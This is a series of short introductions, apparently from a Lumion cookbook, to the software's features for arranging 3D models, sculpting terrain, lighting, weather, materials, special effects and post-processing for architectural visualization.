Lumion uses the flexibility of shortcuts to improve the control we have in the 3D world. Once we import a 3D model, or even if we use a model from the Lumion library, we need to adjust the position, the orientation, and the scale of the 3D model. But keep in mind the importance of organizing your 3D world using layers as well. They are free, and they will become very useful when we need to hide some objects to focus our attention on a specific detail or when we use the Hide layer and Show layer effects.

At a certain point in our project, we will need to go back and undo a mistake or something that doesn't look as expected. Lumion offers you a very limited undo option. When working with Lumion, and in particular when organizing our 3D world and arranging and adjusting the 3D models, we might find the possibility of locking the 3D model's position useful. This helps us avoid selecting and unintentionally moving other, already placed 3D models.

From the beginning of our project with Lumion, it is very important for us to organize and categorize our 3D world. Sometimes we may not do this straightaway, and only after importing some 3D models and adding some content from the Lumion library do we realize the need to organize our project in a better way. We can use layers and assign the existing 3D models to a new layer.

Over the course of a project, it is very common to have certain 3D models updated, and we need to bring those updated 3D models into our Lumion project. This can be a rather daunting task, taking into account that most of the time these updates to the 3D models happen after we have already assigned materials to the imported 3D model. Sometimes during the project, we may face a radical change in a 3D model we have already imported into the Lumion project. The worst scenario is reassigning all the materials to the new 3D model and perhaps relocating it to the correct place. However, Lumion has an option to help us with this and to avoid reassigning all the materials, or at least most of them, and the 3D models will stay in exactly the same place.

After importing a 3D model we created in our favorite 3D modeling package, it is likely that we will want to enhance the look and the environment of the project by using additional 3D models. The lack of detail and content will definitely create a lifeless and dull image or video. Lumion will help you not only learn how to place content from the Lumion library, but also discover what you need.

Something indispensable for a smooth workflow in every project is a set of copy and paste tools. Imagine having to go to the import library to place the 3D model again and assign a material every single time we need a 3D model. Lumion doesn't have the standard copy and paste tool that we can find in most software, but there is a way to emulate this feature. Lumion will help you copy a 3D model already present in your scene and avoid the trouble of going back to the Lumion library every time you need another copy of a model that is already in your project.
Removing or deleting a 3D model is a part of the process of any project. This can be particularly tricky when our 3D world is crowded with 3D models and there is a possibility of selecting and deleting the wrong 3D model. Nevertheless, Lumion does a great job in this area because it protects you from deleting something by mistake.

All projects are different, and this typically brings unique challenges. Sometimes a building or the environment is really intricate, and this can cause difficulties when we are placing 3D models from the Lumion library. Lumion recognizes surfaces and will avoid intersecting them with any 3D model you want to place in your world. However, there are times when this feature may be in our way and cause difficulties when placing a 3D model.

A project needs life, but placing dozens of models one by one is a massive task. Lumion helps us populate our 3D world by providing the option to place more than one copy at a time. By means of a shortcut, we can place 10 copies of a 3D model.

The world we live in is bursting with diversity and variety. Consequently, our eyes are incredibly good at picking up repetitions. Sometimes, even if we cannot explain why, we know something is wrong with a picture because it doesn't look natural. When we are working on a big project, such repetitions stand out almost immediately. We can use a feature in Lumion that gives us the ability to randomize the size of 3D models while placing them.

With more than 2,000 models, we can say that Lumion has everything we need for our project. Although Lumion has predefined models, that doesn't mean we can't modify some basic options. We can modify simple settings such as color and texture, but keep in mind that this doesn't mean we can change these settings on every single 3D model.

In almost every project, we have some autonomy to place the 3D models and organize the 3D world. Nevertheless, there are times when we really need more accuracy than one can get with the mouse. Lumion's coordinate system can assist us with this task.

Typically, we focus our attention on selecting separate 3D models so that we can make exact and accurate adjustments. Eventually, we will need to make alterations and modifications to multiple 3D objects. Lumion shows you how you can do this, along with a practical application.

While working with selections in Lumion, every time we make a selection and transform the 3D model, we need to choose the correct category. There are particular occasions when we need to select and manipulate 3D models that belong to different categories. Lumion can select 3D models from different categories in one go. Initially, we may find Lumion very restrictive in the way it works with the content placed in our project because we need to select the correct category every time we want to work with a 3D model. However, we can bypass these restrictions by using the option to select and move any 3D model in our world without selecting a category.

As mentioned earlier, the world we live in is full of diversity and randomness; however, on almost every project, there are situations when we need to place content in an orderly way. A quick example is when we need to place garden lamps along a path and they need to be spaced equally. This can be done in Lumion.
Lumion is a unique application not only because of the incredible quality of what we can do with it, but also because it has features that initially may not seem beneficial at all until we work on a project where we see a practical application. One example is when we need to align the orientations of different 3D models; Lumion shows not only how to use this feature, but also how to apply it in a practical situation.

While populating and arranging our project, there are times when a snapping tool comes in handy. We can always use the move and height tools to place a 3D model on top of or next to another 3D model, but Lumion allows us to snap multiple 3D models to the same position in an easy way.

While placing content in our project, we are usually concerned about the location of the 3D model. However, later we realize that our project is too uniform, and this is easily spotted with plants, trees, flowers, and other objects. Instead of selecting an individual 3D model and manually rotating, relocating, and rescaling it to bring some variety to our project, Lumion helps us out with a fantastic feature to randomize the orientation, position, and scale of the 3D models.

Even in the most perfect project, we can find variations in the terrain and in the building; it's natural to find inclined surfaces. Rotate on model is a feature in Lumion that allows us to snap to the surface of other 3D models when we are moving a 3D model. We can use this to adjust a car on a slope or a book on a chair.

While changing the 3D model's rotation, we can see that when the 3D model gets close to a 90 degree angle, it will snap automatically. This is fine, perhaps, in most cases, but there are times when we need to make some precise adjustments and this option can get in our way. Lumion lets us deactivate this feature temporarily.

An initial tactic to sculpt and shape the terrain is to use the terrain brushes available in Lumion. Lumion is not an application like ZBrush, but it does well with the brushes provided to sculpt the terrain, and they are not difficult to master. Lumion explains how we can use them and shows some practical applications in real projects. We know how to use the five brushes to sculpt the terrain and the different results of each one of them. However, we are not limited to the standard values used in each brush, because Lumion allows us to change two settings to help us sculpt the terrain. This control is useful when we need to add detail at a small or large scale.

Some projects don't require any specific terrain from us, but at the same time, we don't want to use a flat terrain. In the Terrain menu, we can find some tools that help us quickly create mountains and modify other characteristics of our project. When we start a new project in Lumion, we can start with nine different presets. They sort of work as a shortcut to help us get the appearance we want for our project. Most of the time, we may use the Grass preset, but that doesn't mean we are stuck with the landscape presented. We know how we can sculpt the terrain, but we can do more than that in Lumion and see how we can completely change the aspect of the landscape. Although we have 20 presets to entirely change the look of the landscape, this doesn't mean that we cannot change any settings and actually paint the landscape. Lumion explores the Paint submenu and shows how we can use Lumion's textures to paint and change the landscape completely.
Perhaps you don't want the trouble of sculpting the terrain using the tools offered in Lumion. Truth be told, in some situations it is easier and more productive to model the terrain outside Lumion and import that terrain along with the building. Lumion has a fantastic material that blends the terrain we imported with the landscape.

Another solution to create accurate terrains is by means of a heightmap. A heightmap is a texture with stored values that can be used, in this case, by Lumion, which translates this 2D information into a 3D terrain. Lumion will help you see how you can import a heightmap and save the terrain you created in Lumion as a heightmap file.

It is remarkable how little things, such as defining the Sun's direction, can have a considerable impact on a project. Throughout the production process, we may need to adjust the Sun's direction to have a clear view of the project; however, in due course, we will get to a point where we need to define the final orientation that we are going to use to produce a still image or a movie. Setting up the Sun's direction and height is one of the simplest tasks in Lumion; however, by only using the Weather menu, we can start feeling that there is a lack of control over these settings. Fear not though! Lumion offers an effect that helps control the Sun in a way that can make all the difference when producing a video. Lumion will help you understand not only how you can modify the settings for the Sun, but will also provide you with a practical example of how you can apply this feature in any project.

A shadow can be defined as an area that is not, or is only partially, illuminated because an object is obstructing its source of illumination. It is true that we don't often think of shadows as important and essential elements for creating a good-looking scenario, but without them our project will be dull. Lumion is going to help us use the Shadow effect to tweak and correct the shadows in order to meet our requirements and the finished look we want to accomplish.

An additional aspect connected to shadows in Lumion (and it happens in the real world too) is the influence of the sky on shadows. Taking a look at the shadows in any project, you can easily see how a sunset or a midday scene can transform the color of the shadows. Lumion will show how to control and change the influence that skylight has on shadows.

We have been working entirely with hard shadows. The Sun in our 3D world can produce these hard shadows, and they are called by this name because they have strong, well-defined edges with little transition between illumination and shadow. Soft shadows can be produced by the Sun in certain circumstances, and the sky, likewise, can create these diffused shadows with soft edges. We can apply soft shadows to our project to enrich the final look.

So far, we have been looking at how we can use the Weather menu to create an enjoyable environment for our exterior scenes. Lumion is also capable of producing beautiful interior scenes, but we need to work a little bit on the interior illumination before we can produce something that is presentable and eye-catching. For interior scenes, we can use the Global Illumination effect to improve the illumination that is provided either by the Sun or by some artificial source of illumination.

An element that can bring an extra touch to the final movie is the clouds.
This is a component that does not always cross our mind when trying to attain a good-looking and realistic movie. Lumion provides us with a lot of freedom not only to change the appearance of the clouds, but also to animate them and even create volume clouds to bring this fine-tuning to a different dimension.

Fog is a natural phenomenon that can be added to our project, and it can really change a scene dramatically. With it, we can make a scene more mysterious or reproduce the haze where dust, smoke, and other dry particles obscure the clarity of the sky. With the Fog effect, we can achieve this and much more.

The fact that we can add rain and snow as easily as reading this sentence really proves that Lumion is a powerful and versatile application. Adding rain or snow is something that we can easily achieve by adding two effects in the Photo or Movie mode.

Lumion by default uses wind in any project you start. Once you add the first trees, you can see how they slowly move, showing the effect of the wind. We can control the wind using the, yes you are right, Foliage Wind effect.

Another option to control the Sun is to use a new feature introduced in Lumion Version 4. This option, which we can find under the Effects label, is called Sun study. It is an amazing feature that allows us to select any point on the planet and mimic the Sun in that location. However, there is much more that we can do with this effect.

Lumion has more than 500 materials on hand, and generally this is more than adequate. Still, Lumion is a very flexible application, and for this reason, you are not stuck with just these materials. We have the opportunity to use our own textures to create other materials. Lumion is not going to show you all the settings that you can use to tweak the material; instead, we are going to focus on how we can replace and adjust an outside texture.

Making a 3D model invisible or hiding surfaces of our 3D model is something that we don't anticipate doing in every project. However, there are times when the Invisible material can be very handy, and Lumion demonstrates not only how to apply it, but also some specific situations in which we may consider using this material.

Glass is essential in any project we work on. From the glass in a complex window to a simple cup made of glass, this material has a deep impact on a still image, and even more on a movie, helping us capture the light and reflections of the environment. Lumion has a glass material that can be used to create some of these materials. The Glass material can be manipulated to get a more realistic look.

During production, it is expected that we save the materials applied to the 3D models. This should be done as a precaution, in case something goes wrong or when we need to go back and forth with materials, without having to lose any settings. Lumion has an option to save the materials you applied to a 3D model and later load them again, if necessary. There is another feature that Lumion is going to show you which will give you a chance to save a single material instead of material sets.

There are different ways in which we can add water to our project. We can create an ocean as easily as reading this sentence, and the same is true when we need to add a body of water or create a swimming pool. However, what if we want to create a fountain? Let's go even further: can we create a river? Lumion will teach you how easy it is to create a streaming water effect.
Another beautiful and eye-catching effect is when we have glowing materials in our project. From light bulbs to TV screens, we can add an extra touch to our scene by using the Standard material to create this glow effect. Lumion will teach you not only how to add this glow, but also how you can use textures to produce interesting effects.

After adding trees, bushes, and other plants, the next thing you should add to the project is some grass. Prior to Lumion Version 4, you had to be satisfied with the terrain's texture. We could also import some grass, though the project would become very heavy. You can also add some grass from the Lumion library and adjust that grass in the best way possible. Now, Lumion provides an option to use realistic grass, bringing that wow factor.

Each material has a certain amount of reflection, and this is a setting that we can adjust in almost every material that we can find in Lumion. Taking into account that Lumion is a real-time application, it is natural that, in some cases, the reflections don't meet our requirements in terms of accuracy. Lumion has an effect that we can apply to surfaces in our 3D model to improve these reflections.

While applying and tweaking materials, you may come across a section in your 3D model where you can easily see some flickering. Although this should be avoided, there is an inbuilt setting in every Lumion material to correct this problem.

Fire is a special effect that is available in Lumion and is one of those elements that can bring an ordinary scene to life. We may have a living room that per se is excellent with all the materials and light, but when we add fire to the fireplace, it completely transforms the room into a warm, comfortable, and welcoming living room. Alternatively, consider how the same living room can be changed to introduce a romantic scene when illuminated with candles and a fireplace. Lumion aims to help you apply fire and control it using the Edit properties menu.

In addition to the solid and liquid elements in Lumion, we can find elements that we could label as non-solid. Lumion has a special section for these elements, opening with smoke, passing all the way through dust, and then finishing with fog and water vapor. How we can place these elements in our project, and a realistic application of some of them, is what Lumion will teach you.

Fountains have their distinctive place in Lumion, and there is a tab dedicated to different categories of fountains. We can separate this tab into two parts: standard fountains and fountains produced by a waterspray emitter. Lumion aims to show you where to find these fountains, how to place them in the scene, and also provide you with some useful applications.

Falling leaves are an enjoyable extra touch that can improve our still image or movie. Nevertheless, like the preceding special effects, this one needs to be used in the correct amount. Too much can ruin the scene, making the viewer focus more on leaves passing across the screen than on the 3D model itself.

We can add text to a movie or a still image using the Titles effect, but in some circumstances, we need a text element with some more flexibility. Sometimes, when working on a presentation of a project, we are required to show some additional information; this can be easily achieved using this fantastic feature available in Lumion. We can add text to our project in the Build mode.
A clip plane is an object that can be added to a scene and later used in the Movie mode, and it can be animated to produce a kind of revealing effect. Initially, it may seem a little bit confusing, but you will understand how to apply it to your scene and animate this plane.

It is time to move on from special effects, such as fire, smoke, and water, that we can add to the scene and move towards effects that we can apply in both the Movie and Photo modes. Lumion gives you an overview of how general effects work, how you can stack them in either the Movie or Photo mode, and how you can control them. It is logical that all the effects available in Lumion are applied using either the Movie or Photo mode. The reason for this is that if all those effects were applied in the Build mode, they would have a massive impact on the performance of the viewport, slowing down our workflow. However, Lumion likes to provide you with the freedom needed to produce the best result possible, and in some situations, it could be useful to check the effects in the Build mode.

Bloom is the halo effect caused principally by bright lights in the scene. In the real world, the camera lenses we use can never focus perfectly, but this is not a problem under normal conditions. However, when there is an intensely bright light in the scene, these imperfections are perceptible and visible, and as a consequence, in the photo that we shoot, the bright light will appear to bleed beyond its natural borders.

Purple fringing, distortion, and blurred edges are a combination of errors called chromatic aberration. A simple explanation is that chromatic aberration happens when there is a failure on the part of the lens to focus or bring all the wavelengths of color to the same focal plane. As light travels through the lens, the different colors travel at different speeds and go to different places on the camera's sensor. With 3D cameras, this doesn't happen, but we can add chromatic aberration to our image or video, giving an extra touch of realism.

The expression "color correction" has a fair number of different meanings. However, generally speaking, we can say that it is a means to repair problems with the color, and we do that by changing the color of a pixel to another color or by tweaking other settings. In Lumion, this means that we can use color correction either to achieve a certain look or to enhance the overall aspect and mood of an image or a movie. We can use this effect in Lumion and apply a few tips to help us not only correct the color, but also perform some color grading.